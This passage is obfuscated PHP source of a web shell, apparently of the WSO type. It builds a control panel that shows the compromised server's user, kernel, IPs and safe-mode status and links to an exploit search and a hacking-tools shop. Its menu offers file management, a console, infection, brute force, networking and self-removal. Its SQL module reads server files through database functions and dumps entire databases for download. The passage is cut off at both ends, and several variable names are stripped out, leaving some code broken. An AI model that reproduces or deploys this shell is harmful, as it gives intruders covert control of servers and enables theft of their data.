"\x68\164\x74\x70\x3a\57\x2f\156\157\162\145\x66\x65\162\x65\x72\56\x64\145\x2f\x3f\x68\x74\164\x70\72\57\57\167\167\x77\x2e\145\x78\160\x6c\x6f\151\x74\55\x64\142\x2e\x63\x6f\155\x2f\x73\x65\x61\162\x63\x68\x2f\77\x61\143\164\151\x6f\x6e\x3d\163\x65\141\162\143\150\x26\144\x65\x73\x63\x72\x69\160\164\151\x6f\156\x3d"; if (strpos("\114\151\156\165\170", $kernel) !== false) { $explink .= urlencode("\114\151\x6e\165\x78\40\113\x65\162\x6e\x65\x6c\x20" . substr($release, 0, 6)); } else { $explink .= urlencode($kernel . "\40" . substr($release, 0, 3)); } if (!function_exists("\x70\157\163\151\170\x5f\x67\145\x74\x65\x67\x69\x64")) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "\x3f"; } else { $uid = @posix_getpwuid(@posix_geteuid()); $gid = @posix_getgrgid(@posix_getegid()); $user = $uid["\156\141\x6d\x65"]; $uid = $uid["\165\151\144"]; $group = $gid["\x6e\x61\155\x65"]; $gid = $gid["\x67\151\144"]; } $cwd_links = ''; $path = explode("\57", $GLOBALS["\x63\167\x64"]); $n = count($path); for ($i = 0; $i < $n - 1; $i++) { $cwd_links .= "\x3c\x61\x20\150\162\x65\146\x3d\x27\x23\x27\40\x6f\156\143\154\x69\143\153\x3d\x27\x67\50\42\x46\x69\x6c\145\x73\x4d\141\156\42\x2c\x22"; for ($j = 0; $j <= $i; $j++) { $cwd_links .= $path[$j] . "\x2f"; } $cwd_links .= "\42\x29\47\76" . $path[$i] . "\x2f\x3c\57\141\76"; } $charsets = array("\x55\x54\106\x2d\70", "\x57\151\x6e\x64\157\x77\163\55\61\x32\65\61", "\x4b\117\x49\70\x2d\122", "\113\117\x49\70\55\125", "\x63\x70\70\66\66"); $opt_charsets = ''; foreach ($charsets as $) { $opt_charsets .= "\74\157\160\x74\x69\x6f\156\40\x76\x61\x6c\165\145\x3d\x22" . $ . "\42\40" . ($_POST["\143\x68\x61\162\x73\145\164"] == $ ? "\x73\145\154\145\143\164\x65\x64" : '') . "\76" . $ . "\x3c\x2f\157\x70\x74\x69\x6f\156\76"; } $m = array("\x53\x65\143\56\40\111\x6e\146\x6f" => "\x53\x65\143\x49\156\x66\157", "\x46\151\154\x65\x73" => "\x46\151\x6c\x65\163\x4d\x61\156", "\103\157\156\163\x6f\154\x65" => "\x43\157\156\163\157\154\x65", "\x49\x6e\x66\x65\x63\164" => "\x49\156\146\145\x63\164", "\123\161\x6c" => "\x53\161\154", "\120\150\160" => "\120\150\160", "\123\x61\146\145\x20\x6d\157\x64\145" => "\x53\x61\146\145\115\x6f\144\145", "\x53\x74\162\x69\156\x67\40\x74\x6f\x6f\x6c\163" => "\123\164\162\x69\x6e\147\x54\x6f\x6f\154\163", "\102\x72\x75\164\145\x66\157\x72\143\145" => "\102\x72\165\x74\x65\146\157\162\x63\x65", "\116\x65\164\x77\x6f\x72\153" => "\x4e\145\x74\167\157\x72\x6b"); if (!empty($GLOBALS["\342\x96\233"])) { $m["\x4c\157\x67\157\x75\164"] = "\114\x6f\147\x6f\165\x74"; } $m["\x53\145\x6c\x66\x20\162\x65\x6d\157\166\145"] = "\123\145\154\146\122\145\x6d\157\x76\145"; $menu = ''; foreach ($m as $k => $v) { $menu .= "\x3c\164\x68\76\133\x20\x3c\x61\40\x68\x72\x65\146\x3d\42\x23\42\x20\x6f\156\143\154\x69\x63\x6b\75\x22\147\x28\47" . $v . "\x27\54\x6e\165\x6c\154\54\47\47\54\47\x27\x2c\x27\x27\51\42\x3e" . $k . "\x3c\x2f\x61\76\40\135\74\57\x74\x68\76"; } $drives = ''; if ($GLOBALS["\157\163"] == "\167\151\156") { foreach (range("\x63", "\x7a") as $drive) { if (is_dir($drive . "\72\134")) { $drives .= "\74\x61\40\x68\x72\x65\x66\x3d\42\43\42\40\x6f\156\x63\x6c\x69\143\153\x3d\42\x67\50\47\106\151\154\145\x73\x4d\x61\156\47\x2c\47" . $drive . "\72\57\47\51\42\x3e\x5b\40" . $drive . "\40\135\74\57\141\x3e\x20"; } } } echo "\x3c\164\141\x62\x6c\x65\x20\143\154\141\163\163\x3d\151\x6e\x66\x6f\x20\143\x65\x6c\154\x70\x61\144\x64\x69\156\x67\75\63\x20\x63\145\x6c\154\163\x70\x61\143\x69\x6e\147\75\x30\40\167\151\x64\x74\150\x3d\x31\60\60\45\76\x3c\164\x72\76\74\x74\144\40\167\151\x64\x74\x68\x3d\x31\76\74\x73\160\141\156\x3e\123\150\145\x6c\x6c\72\x3c\x62\162\76\x55\156\141\x6d\x65\x3a\74\142\x72\76\125\163\145\x72\72\x3c\142\162\76\x50\150\x70\72\74\x62\x72\76\x48\144\144\72\74\x62\162\76\103\x77\x64\72" . ($GLOBALS["\157\163"] == "\x77\151\x6e" ? "\x3c\x62\x72\76\104\x72\151\166\x65\163\72" : '') . "\x3c\x2f\163\x70\x61\x6e\76\x3c\x2f\x74\x64\x3e" . "\74\x74\144\x3e\74\x61\x20\150\162\145\146\75\x22\x68\x74\164\160\x73\72\x2f\57\167\167\167\x2e\x73\155\x61\x72\164\x74\157\157\154\163\163\150\x6f\x70\x2e\x70\x77\x22\x3e\x53\155\x61\162\x74\40\x54\x6f\x6f\x6c\x73\40\x53\x68\x6f\x70\x3c\57\x61\76\40\105\x64\151\164\x69\157\156\x2e\x20\x28\40\x3c\x61\x20\x68\162\145\146\75\42\150\x74\x74\x70\x73\72\57\x2f\x77\x77\x77\56\x73\155\141\x72\x74\164\157\157\x6c\163\x73\x68\x6f\160\56\x64\141\x74\x65\42\76\x77\167\167\x2e\163\x6d\141\x72\164\x74\157\157\154\163\x73\x68\x6f\x70\56\144\x61\164\145\x3c\57\x61\x3e\x20\x7c\x20\x3c\x61\x20\150\x72\x65\x66\75\42\x68\164\164\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\163\155\x61\x72\164\x74\157\157\154\x73\x73\150\157\160\x2e\x6c\x69\x6e\153\42\x3e\167\x77\x77\56\163\x6d\x61\162\x74\x74\x6f\157\x6c\x73\163\150\x6f\x70\x2e\x6c\151\x6e\153\x3c\57\x61\x3e\x20\174\40\x43\x68\x65\x63\153\x20\74\x61\40\150\162\x65\146\75\x22\150\x74\164\x70\x73\72\57\x2f\160\141\x73\164\x65\142\151\156\56\143\157\155\x2f\162\x61\x77\x2f\145\x59\x52\103\x50\166\x6d\120\42\x3e\150\164\x74\160\x73\72\x2f\x2f\160\x61\163\x74\x65\x62\151\x6e\x2e\143\157\x6d\x2f\x72\x61\167\x2f\x65\x59\x52\103\x50\x76\x6d\120\74\x2f\x61\x3e\x20\x49\x6e\143\x61\x73\145\40\x74\x68\x65\x20\x64\x6f\155\x61\x69\156\x73\40\167\145\x6e\164\40\x64\x6f\167\156\x20\x29\x3c\142\162\x3e\74\x6e\157\x62\162\x3e" . substr(@php_uname(), 0, 120) . "\x20\x3c\x61\x20\x68\162\x65\146\75\42\x68\164\164\160\72\57\x2f\x6e\157\x72\x65\x66\x65\x72\145\x72\56\x64\145\x2f\x3f\150\x74\x74\x70\x3a\x2f\x2f\167\x77\167\56\x67\x6f\157\x67\154\x65\56\143\157\155\57\163\145\x61\x72\x63\150\77\161\75" . urlencode(@php_uname()) . "\x22\40\x74\x61\x72\x67\145\164\75\x22\137\142\x6c\x61\x6e\x6b\x22\x3e\x5b\40\107\157\157\147\x6c\x65\40\135\74\57\x61\76\x20\x3c\x61\x20\150\x72\x65\x66\x3d\x22" . $explink . "\42\40\x74\x61\x72\x67\x65\164\x3d\x5f\142\154\x61\x6e\153\x3e\x5b\40\105\x78\160\154\x6f\151\164\55\x44\102\x20\x5d\74\x2f\x61\x3e\x3c\x2f\x6e\x6f\x62\x72\76\x3c\x62\162\x3e" . $uid . "\x20\50\x20" . $user . "\x20\x29\x20\x3c\163\x70\141\x6e\x3e\107\162\157\x75\160\72\x3c\x2f\163\160\x61\x6e\76\40" . $gid . "\x20\x28\x20" . $group . "\40\x29\x3c\142\162\x3e" . @phpversion() . "\x20\x3c\163\x70\x61\156\76\x53\x61\x66\145\x20\155\157\x64\x65\72\74\x2f\163\160\x61\x6e\76\x20" . ($GLOBALS["\163\x61\146\x65\137\x6d\157\x64\145"] ? "\74\x66\x6f\156\x74\x20\x63\x6f\x6c\x6f\162\75\162\x65\x64\x3e\x4f\116\74\x2f\146\157\156\164\x3e" : "\74\146\x6f\x6e\164\40\x63\157\x6c\157\x72\x3d\43\x46\106\x44\x42\x35\x46\76\74\142\x3e\117\106\x46\74\57\142\76\74\x2f\146\x6f\156\164\76") . "\40\74\141\40\150\162\145\x66\x3d\43\x20\x6f\156\x63\154\x69\143\x6b\75\x22\147\x28\47\120\x68\x70\x27\x2c\x6e\x75\x6c\x6c\54\x6e\x75\154\x6c\54\47\151\156\146\x6f\47\51\42\76\x5b\x20\160\x68\x70\151\156\146\157\40\x5d\74\x2f\141\76\40\74\163\160\141\156\x3e\104\x61\164\145\164\151\x6d\145\72\74\x2f\x73\x70\x61\x6e\76\x20" . date("\x59\55\x6d\55\144\x20\110\72\151\x3a\163") . "\74\142\x72\76" . viewSize($totalSpace) . "\40\74\x73\x70\141\x6e\76\x46\162\145\145\x3a\74\57\x73\x70\141\156\x3e\40" . viewSize($freeSpace) . "\40\x28" . round(100 / ($totalSpace / $freeSpace), 2) . "\x25\x29\74\x62\162\x3e" . $cwd_links . "\40" . viewPermsColor($GLOBALS["\143\x77\144"]) . "\40\74\x61\40\x68\162\x65\x66\75\x23\x20\x6f\x6e\x63\x6c\151\143\153\75\42\x67\x28\x27\106\151\x6c\145\x73\x4d\x61\x6e\47\x2c\x27" . $GLOBALS["\150\x6f\155\145\137\x63\167\x64"] . "\47\54\x27\x27\54\47\x27\54\x27\47\51\x22\x3e\x5b\40\x68\x6f\155\145\x20\x5d\x3c\x2f\141\76\74\x62\x72\76" . $drives . "\74\57\164\x64\x3e" . "\74\164\144\40\x77\x69\x64\164\x68\x3d\x31\40\141\154\x69\x67\x6e\75\162\x69\147\x68\x74\x3e\74\156\157\142\162\x3e\74\154\141\x62\145\154\76\x3c\x73\x65\x6c\145\x63\x74\40\157\156\x63\x68\x61\156\x67\x65\x3d\x22\x67\50\x6e\x75\x6c\x6c\x2c\156\x75\154\154\x2c\156\x75\154\x6c\54\x6e\x75\154\x6c\x2c\x6e\165\x6c\154\54\x74\x68\x69\x73\56\166\x61\154\x75\x65\x29\x22\x3e" . $opt_charsets . "\x3c\57\x73\x65\x6c\x65\x63\164\76\x3c\57\154\x61\142\x65\x6c\76\74\x62\162\76\x3c\163\160\x61\x6e\76\x53\x65\162\166\145\162\40\111\x50\72\x3c\x2f\x73\x70\141\x6e\76\74\142\x72\x3e" . gethostbyname($_SERVER["\x48\x54\x54\120\x5f\x48\117\x53\124"]) . "\x3c\x62\162\76\x3c\163\x70\x61\156\x3e\103\x6c\151\145\x6e\x74\40\111\120\72\x3c\57\163\x70\141\156\x3e\74\x62\x72\x3e" . $_SERVER["\122\105\115\117\x54\x45\x5f\101\104\x44\x52"] . "\x3c\57\x6e\x6f\142\162\76\74\57\x74\x64\76\x3c\57\x74\x72\x3e\74\x2f\x74\141\142\154\x65\76" . "\74\164\x61\x62\x6c\145\40\x73\x74\171\x6c\145\x3d\x22\x62\141\x63\153\x67\x72\157\165\156\x64\55\x63\x6f\x6c\x6f\x72\x3a\43\62\x45\66\105\x39\103\x3b\x22\x20\x63\x65\x6c\154\160\141\144\144\151\156\147\75\63\40\x63\145\154\x6c\163\x70\141\x63\151\x6e\147\75\x30\40\x77\x69\x64\x74\x68\x3d\61\x30\x30\45\x3e\x3c\164\x72\76" . $menu . "\74\57\x74\162\x3e\74\57\x74\141\x62\x6c\145\76\x3c\144\151\x76\76"; } goto qhLgb; hgt_8: function actionSql() { class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname) { switch ($this->type) { case "\x6d\x79\x73\x71\154": if ($this->link = @mysql_connect($host, $user, $pass, true)) { return true; } break; case "\160\x67\163\x71\154": $host = explode("\72", $host); if (!$host[1]) { $host[1] = 5432; } if ($this->link = @pg_connect("\x68\157\x73\x74\x3d{$host[0]}\40\x70\157\162\x74\75{$host[1]}\x20\x75\163\145\x72\x3d{$user}\x20\x70\x61\163\x73\167\x6f\x72\x64\75{$pass}\40\144\x62\156\x61\155\x65\75{$dbname}")) { return true; } break; } return false; } function selectdb($db) { switch ($this->type) { case "\x6d\171\163\161\154": if (@mysql_select_db($db)) { return true; } break; } return false; } function query($str) { switch ($this->type) { case "\x6d\171\163\161\154": return $this->res = @mysql_query($str); break; case "\160\x67\x73\x71\x6c": return $this->res = @pg_query($this->link, $str); break; } return false; } function fetch() { $res = func_num_args() ? func_get_arg(0) : $this->res; switch ($this->type) { case "\155\171\x73\x71\154": return @mysql_fetch_assoc($res); break; case "\x70\x67\x73\161\154": return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch ($this->type) { case "\x6d\171\x73\x71\x6c": return $this->query("\123\x48\x4f\x57\40\144\x61\x74\141\142\x61\163\145\163"); break; case "\160\x67\x73\161\x6c": return $this->res = $this->query("\123\105\114\x45\103\x54\40\x64\x61\x74\156\x61\155\x65\40\106\122\117\115\40\x70\x67\x5f\x64\141\x74\141\x62\x61\x73\x65\40\127\110\105\x52\x45\40\x64\141\x74\x69\163\x74\x65\x6d\x70\x6c\x61\x74\145\41\x3d\x27\x74\47"); break; } return false; } function listTables() { switch ($this->type) { case "\155\x79\x73\x71\154": return $this->res = $this->query("\x53\110\x4f\127\x20\124\x41\102\114\x45\x53"); break; case "\160\147\x73\161\x6c": return $this->res = $this->query("\x73\x65\154\x65\x63\x74\40\x74\141\x62\154\x65\137\x6e\x61\155\x65\40\146\162\x6f\x6d\x20\x69\156\146\157\x72\155\141\x74\x69\x6f\x6e\137\x73\x63\x68\x65\155\x61\x2e\164\x61\142\154\x65\x73\40\x77\x68\145\x72\x65\40\164\141\x62\x6c\x65\x5f\163\143\150\x65\155\x61\40\41\x3d\x20\x27\x69\x6e\x66\x6f\x72\x6d\141\164\151\x6f\156\x5f\x73\143\x68\145\155\141\x27\40\101\116\x44\40\x74\x61\142\154\x65\x5f\163\x63\150\x65\155\141\40\x21\x3d\40\47\160\x67\x5f\143\x61\x74\141\154\157\147\x27"); break; } return false; } function error() { switch ($this->type) { case "\x6d\171\x73\x71\x6c": return @mysql_error(); break; case "\x70\x67\x73\x71\154": return @pg_last_error(); break; } return false; } function setCharset($str) { switch ($this->type) { case "\x6d\171\x73\161\x6c": if (function_exists("\155\x79\x73\161\154\x5f\x73\145\x74\x5f\x63\x68\141\162\163\145\x74")) { return @mysql_set_charset($str, $this->link); } else { $this->query("\x53\105\x54\40\103\110\x41\x52\123\x45\x54\x20" . $str); } break; case "\x70\147\163\161\x6c": return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch ($this->type) { case "\x6d\x79\x73\161\x6c": return $this->fetch($this->query("\x53\x45\x4c\x45\103\x54\x20\114\117\x41\104\137\106\111\x4c\x45\50\x27" . addslashes($str) . "\x27\51\40\x61\x73\40\x66\x69\x6c\145")); break; case "\x70\147\x73\x71\x6c": $this->query("\103\122\105\x41\124\x45\x20\x54\x41\x42\114\x45\x20\150\141\x72\144\x32\50\146\151\154\x65\x20\x74\145\170\164\51\x3b\x43\117\120\131\x20\x68\x61\x72\144\62\40\106\x52\117\115\40\47" . addslashes($str) . "\x27\x3b\163\x65\x6c\x65\x63\x74\40\x66\x69\x6c\145\x20\x66\x72\x6f\x6d\x20\x68\141\x72\144\62\x3b"); $r = array(); while ($i = $this->fetch()) { $r[] = $i["\x66\151\154\x65"]; } $this->query("\x64\162\x6f\x70\x20\164\x61\142\x6c\x65\40\150\141\x72\144\62"); return array("\146\x69\x6c\x65" => implode("\12", $r)); break; } return false; } function dump($table, $fp = false) { switch ($this->type) { case "\155\171\163\161\x6c": $res = $this->query("\x53\110\117\127\x20\103\x52\x45\101\124\x45\x20\x54\x41\102\x4c\105\x20\140" . $table . "\140"); $create = mysql_fetch_array($res); $sql = $create[1] . "\x3b\xa"; if ($fp) { fwrite($fp, $sql); } else { echo $sql; } $this->query("\123\x45\114\x45\x43\x54\40\52\40\x46\122\117\115\40\x60" . $table . "\x60"); $i = 0; $head = true; while ($ = $this->fetch()) { $sql = ''; if ($i % 1000 == 0) { $head = true; $sql = "\73\12\12"; } $columns = array(); foreach ($ as $k => $v) { if ($v === null) { $[$k] = "\116\x55\114\x4c"; } elseif (is_int($v)) { $[$k] = $v; } else { $[$k] = "\x27" . @mysql_real_escape_string($v) . "\47"; } $columns[] = "\140" . $k . "\x60"; } if ($head) { $sql .= "\x49\x4e\x53\105\x52\x54\40\x49\x4e\x54\117\40\x60" . $table . "\x60\x20\50" . implode("\x2c\40", $columns) . "\x29\40\x56\101\x4c\x55\105\123\40\xa\x9\x28" . implode("\x2c\40", $) . "\x29"; $head = false; } else { $sql .= "\12\11\54\50" . implode("\x2c\x20", $) . "\51"; } if ($fp) { fwrite($fp, $sql); } else { echo $sql; } $i++; } if (!$head) { if ($fp) { fwrite($fp, "\x3b\xa\xa"); } else { echo "\73\xa\12"; } } break; case "\x70\147\163\x71\x6c": $this->query("\123\x45\114\105\103\x54\40\52\x20\106\x52\x4f\x4d\x20" . $table); while ($ = $this->fetch()) { $columns = array(); foreach ($ as $k => $v) { $[$k] = "\47" . addslashes($v) . "\47"; $columns[] = $k; } $sql = "\x49\116\123\x45\122\x54\x20\111\116\124\117\x20" . $table . "\x20\x28" . implode("\54\40", $columns) . "\x29\x20\126\x41\x4c\x55\x45\x53\x20\x28" . implode("\x2c\x20", $) . "\x29\73" . "\12"; if ($fp) { fwrite($fp, $sql); } else { echo $sql; } } break; } return false; } } $db = new DbClass($_POST["\x74\171\x70\145"]); if (@$_POST["\x70\x32"] == "\144\157\x77\x6e\154\157\141\144" && @$_POST["\x70\x31"] != "\163\145\x6c\x65\x63\x74") { $db->connect($_POST["\163\161\154\137\150\x6f\x73\164"], $_POST["\x73\161\x6c\137\154\x6f\147\151\x6e"], $_POST["\163\x71\x6c\x5f\x70\141\x73\x73"], $_POST["\x73\x71\154\x5f\142\141\163\145"]); $db->selectdb($_POST["\163\161\x6c\137\x62\141\x73\x65"]); switch ($_POST["\x63\150\141\x72\x73\145\x74"]) { case "\127\151\156\144\x6f\167\163\55\61\62\x35\61": $db->setCharset("\143\x70\x31\62\65\61"); break; case "\125\124\x46\55\70": $db->setCharset("\165\x74\x66\70"); break; case "\x4b\x4f\111\70\x2d\122": $db->setCharset("\x6b\157\151\70\x72"); break; case "\x4b\x4f\111\70\55\x55": $db->setCharset("\153\x6f\151\x38\165"); break; case "\x63\160\70\x36\66": $db->setCharset("\x63\x70\70\66\x36"); break; } if (empty($_POST["\x66\151\154\145"])) { ob_start("\x6f\x62\137\x67\x7a\x68\141\156\x64\154\145\162", 4096); header("\x43\157\156\x74\x65\156\x74\55\x44\x69\x73\160\157\163\x69\164\x69\157\156\x3a\x20\141\x74\164\141\x63\150\155\x65\156\x74\x3b\x20\x66\151\154\145\x6e\x61\x6d\x65\x3d\144\x75\x6d\x70\56\x73\161\154"); header("\103\x6f\x6e\x74\x65\156\x74\55\x54\171\160\x65\72\40\x74\x65\170\164\57\x70\154\x61\x69\x6e"); foreach ($_POST["\164\x62\x6c"] as $v) { $db->dump($v); } die; } elseif ($fp = @fopen($_POST["\146\151\154\145"], "\167")) { foreach ($_POST["\x74\142\154"] as $v) { $db->dump($v, $fp); } fclose($fp); unset($_POST["\x70\62"]); } else { die("\74\x73\x63\162\151\x70\164\76\141\x6c\145\162\164\50\x22\105\162\162\x6f\x72\x21\x20\103\141\x6e\47\x74\x20\157\160\145\x6e\40\146\151\154\x65\42\x29\x3b\x77\x69\156\144\157\x77\x2e\150\x69\x73\x74\x6f\162\171\56\142\141\x63\x6b\50\55\x31\51\74\x2f\163\143\x72\151\x70\x74\x3e"); } } hardHeader(); echo "\12\74\x68\61\x3e\123\161\x6c\x20\x62\x72\x6f\167\163\x65\x72\74\57\150\x31\76\x3c\x64\151\166\40\x63\154\x61\163\163\75\x63\x6f\156\x74\145\156\x74\x3e\12\74\x66\157\162\155\40\x6e\x61\x6d\145\75\47\163\146\x27\40\155\145\164\150\157\144\x3d\47\x70\x6f\x73\164\x27\x20\x6f\x6e\163\165\142\x6d\151\x74\75\x27\x66\163\x28\x74\150\151\x73\51\x3b\47\76\x3c\164\141\142\x6c\145\x20\143\x65\154\x6c\x70\x61\144\144\x69\x6e\x67\75\47\x32\47\40\143\x65\154\x6c\163\x70\141\x63\x69\x6e\x67\x3d\x27\x30\47\x3e\x3c\x74\162\x3e\12\74\164\x64\x3e\x54\171\160\145\x3c\57\164\x64\x3e\74\x74\144\x3e\110\157\x73\x74\x3c\57\x74\x64\x3e\x3c\x74\144\x3e\114\x6f\147\151\x6e\x3c\x2f\164\144\76\x3c\x74\x64\x3e\120\x61\163\x73\167\157\x72\x64\x3c\57\164\144\76\x3c\164\x64\x3e\x44\141\x74\x61\142\x61\x73\x65\x3c\x2f\164\144\x3e\x3c\x74\144\76\x3c\x2f\x74\144\x3e\74\57\x74\162\x3e\74\164\x72\x3e\xa\x3c\x69\156\x70\165\164\x20\164\x79\x70\x65\x3d\150\151\144\144\x65\156\40\x6e\x61\x6d\x65\x3d\156\x65\x20\x76\141\154\x75\145\x3d\47\x27\x3e\x3c\x69\x6e\x70\x75\x74\40\164\171\x70\x65\75\150\x69\x64\x64\x65\x6e\x20\x6e\x61\155\x65\x3d\x61\x20\x76\141\154\165\x65\x3d\x53\x71\x6c\x3e\74\151\156\x70\165\164\40\x74\x79\x70\x65\x3d\x68\x69\144\x64\145\x6e\x20\156\141\155\145\x3d\x70\x31\40\x76\141\x6c\165\145\75\47\x71\x75\x65\162\x79\47\x3e\x3c\x69\156\160\165\164\x20\x74\x79\160\145\75\150\x69\x64\x64\145\x6e\40\x6e\x61\155\x65\75\160\x32\40\x76\x61\x6c\165\x65\x3d\47\x27\76\74\x69\156\160\165\x74\40\164\x79\x70\145\x3d\x68\151\x64\x64\145\x6e\x20\x6e\x61\x6d\145\x3d\x63\x20\166\x61\154\165\x65\75\47" . htmlspecialchars($GLOBALS["\x63\167\144"]) . "\x27\x3e\74\x69\x6e\x70\x75\x74\40\x74\x79\160\x65\75\150\x69\x64\x64\x65\156\40\156\141\x6d\145\75\143\150\141\162\163\x65\164\x20\166\x61\154\165\145\x3d\x27" . (isset($_POST["\x63\150\141\x72\x73\145\x74"]) ? $_POST["\x63\150\x61\x72\163\x65\164"] : '') . "\x27\76\12\x3c\x74\x64\76\74\x6c\141\x62\145\154\76\74\163\145\154\x65\143\164\40\x6e\141\x6d\145\75\47\x74\x79\160\145\x27\x3e\74\157\x70\x74\151\x6f\156\40\x76\x61\154\x75\145\75\47\x6d\171\163\161\x6c\47\x20"; if (@$_POST["\164\171\x70\x65"] == "\x6d\171\x73\161\x6c") { echo "\x73\145\154\145\143\164\x65\144"; } echo "\x3e\x4d\171\x53\161\154\74\x2f\x6f\x70\x74\x69\157\156\x3e\x3c\157\x70\164\x69\157\156\40\x76\141\x6c\165\145\x3d\47\160\147\x73\x71\x6c\x27\x20"; if (@$_POST["\x74\171\160\145"] == "\x70\147\x73\x71\154") { echo "\x73\145\x6c\x65\x63\164\x65\144"; } echo "\x3e\120\157\x73\x74\147\162\x65\x53\x71\x6c\x3c\x2f\157\x70\x74\151\157\156\76\74\57\163\145\154\x65\143\x74\x3e\x3c\x2f\154\x61\142\145\x6c\x3e\x3c\x2f\x74\144\76\12\x3c\x74\144\76\74\x69\x6e\x70\165\x74\x20\x74\171\160\x65\75\164\x65\170\164\x20\x6e\141\x6d\145\75\x73\x71\x6c\x5f\x68\x6f\x73\x74\x20\166\141\154\165\x65\x3d\42" . (empty($_POST["\x73\x71\154\137\150\x6f\x73\x74"]) ? "\x6c\157\143\x61\x6c\150\x6f\163\164" : htmlspecialchars($_POST["\x73\161\x6c\137\x68\157\x73\164"])) . "\x22\76\x3c\57\164\x64\x3e\12\74\x74\144\x3e\74\151\x6e\160\165\164\x20\x74\171\160\x65\x3d\164\145\x78\164\x20\156\141\155\145\x3d\x73\161\x6c\x5f\154\157\x67\x69\156\x20\166\x61\x6c\165\145\x3d\x22" . (empty($_POST["\163\161\x6c\x5f\x6c\157\x67\151\x6e"]) ? "\x72\157\x6f\164" : htmlspecialchars($_POST["\x73\161\154\137\154\157\147\151\156"])) . "\42\76\x3c\57\x74\144\76\xa\74\164\144\76\x3c\x69\x6e\160\165\164\40\164\171\160\145\75\164\x65\170\x74\x20\x6e\141\155\145\75\163\161\154\x5f\160\141\x73\163\x20\166\x61\154\165\145\75\42" . (empty($_POST["\x73\x71\x6c\x5f\x70\141\x73\x73"]) ? '' : htmlspecialchars($_POST["\x73\x71\154\x5f\x70\x61\x73\163"])) . "\42\x20\x72\145\x71\165\x69\162\x65\144\76\74\x2f\x74\x64\76\x3c\164\x64\x3e"; $tmp = "\74\x69\156\160\165\164\x20\x74\171\x70\x65\75\164\x65\170\164\x20\156\x61\155\x65\75\x73\161\x6c\137\x62\141\163\145\40\x76\141\x6c\x75\145\x3d\x27\x27\76"; if (isset($_POST["\x73\x71\154\137\x68\x6f\163\x74"])) { if ($db->connect($_POST["\163\161\x6c\x5f\x68\157\x73\x74"], $_POST["\x73\x71\154\x5f\154\157\x67\151\156"], $_POST["\163\161\x6c\x5f\160\x61\x73\x73"], $_POST["\x73\x71\x6c\x5f\142\x61\x73\x65"])) { switch ($_POST["\143\150\141\x72\163\145\x74"]) { case "\127\151\x6e\x64\x6f\167\163\x2d\x31\x32\x35\61": $db->setCharset("\x63\x70\x31\62\65\61"); break; case "\125\124\106\x2d\x38": $db->setCharset("\x75\x74\146\x38"); break; case "\x4b\117\111\70\x2d\x52": $db->setCharset("\x6b\157\x69\x38\162"); break; case "\x4b\x4f\111\x38\x2d\x55": $db->setCharset("\x6b\157\151\x38\x75"); break; case "\143\160\x38\x36\66": $db->setCharset("\143\x70\x38\66\x36"); break; } $db->listDbs(); echo "\x3c\154\x61\142\145\x6c\x3e\74\163\145\154\145\x63\164\x20\x6e\141\155\x65\x3d\163\x71\x6c\137\142\x61\x73\x65\x3e\x3c\157\x70\164\151\x6f\x6e\40\x76\141\x6c\x75\145\x3d\x27\47\x3e\74\x2f\x6f\x70\164\151\157\x6e\x3e"; while ($ = $db->fetch()) { list($key, $value) = each($); echo "\x3c\157\x70\164\x69\157\156\x20\x76\141\x6c\165\145\x3d\42" . $value . "\42\x20" . ($value == $_POST["\x73\x71\154\137\142\x61\163\145"] ? "\163\x65\154\x65\143\x74\x65\x64" : '') . "\76" . $value . "\74\x2f\157\160\164\x69\157\x6e\x3e"; } echo "\74\x2f\163\x65\x6c\145\x63\x74\76\74\x2f\x6c\x61\x62\145\x6c\76"; } else { echo $tmp; } } else { echo $tmp; } echo "\74\x2f\164\144\x3e\xa\x9\11\x9\11\74\164\144\76\x3c\x69\x6e\x70\165\164\x20\x74\171\160\145\x3d\x73\x75\x62\x6d\151\164\40\x76\x61\x6c\x75\145\75\x27\x73\165\x62\155\151\x74\47\40\x6f\x6e\x63\154\x69\143\153\75\47\146\x73\50\x64\x2e\x73\x66\x29\73\x27\76\74\57\x74\x64\x3e\12\x20\x20\40\x20\40\x20\40\x20\x20\x20\x20\x20\40\x20\x20\40\74\x74\x64\x3e\74\x69\156\160\x75\164\x20\x74\x79\160\x65\75\143\150\145\x63\x6b\142\x6f\x78\40\x6e\x61\x6d\145\75\x73\x71\x6c\x5f\x63\x6f\x75\x6e\164\40\166\141\154\x75\x65\x3d\x27\x6f\156\47" . (empty($_POST["\163\x71\154\x5f\143\x6f\x75\156\x74"]) ? '' : "\x20\x63\x68\x65\x63\x6b\145\x64") . "\76\40\x63\157\x75\x6e\164\40\164\x68\145\x20\156\165\x6d\x62\x65\x72\40\x6f\x66\x20\162\x6f\167\163\x3c\57\x74\144\x3e\xa\x9\x9\x9\x3c\x2f\x74\x72\x3e\12\x9\x9\74\x2f\x74\141\x62\x6c\x65\x3e\xa\11\11\x3c\x73\x63\162\151\x70\x74\x3e\12\40\x20\x20\x20\40\x20\40\40\40\40\x20\40\x73\137\144\142\75\47" . @addslashes($_POST["\x73\x71\154\137\x62\141\x73\145"]) . "\x27\73\xa\x20\x20\x20\40\x20\40\x20\40\x20\40\40\x20\x66\x75\156\x63\164\151\x6f\156\x20\146\163\x28\146\x29\40\173\12\x20\x20\40\x20\x20\40\40\x20\40\40\x20\x20\x20\40\40\40\151\x66\x28\146\x2e\x73\x71\154\137\x62\141\163\145\x2e\166\x61\154\x75\145\x21\x3d\163\137\144\142\x29\x20\173\x20\146\x2e\x6f\x6e\x73\165\142\x6d\x69\x74\x20\x3d\x20\x66\165\156\x63\x74\x69\157\x6e\50\x29\40\173\x7d\x3b\xa\x20\x20\40\x20\40\x20\40\x20\x20\40\x20\x20\40\40\x20\x20\x20\x20\40\x20\x69\x66\50\146\x2e\160\x31\x29\40\146\56\160\61\x2e\x76\x61\154\x75\x65\75\x27\x27\x3b\xa\x20\40\x20\x20\x20\40\40\40\x20\40\40\x20\x20\40\x20\40\40\40\x20\x20\x69\146\x28\x66\56\160\x32\x29\40\146\56\160\62\56\166\x61\154\x75\145\x3d\x27\x27\73\xa\x20\x20\x20\40\x20\40\40\40\40\x20\40\x20\40\x20\40\x20\40\x20\40\40\151\x66\x28\x66\x2e\160\63\51\40\146\x2e\x70\63\56\x76\141\154\165\145\75\x27\47\73\xa\x20\x20\x20\x20\x20\40\x20\x20\40\x20\40\40\40\40\40\x20\175\12\40\40\x20\x20\x20\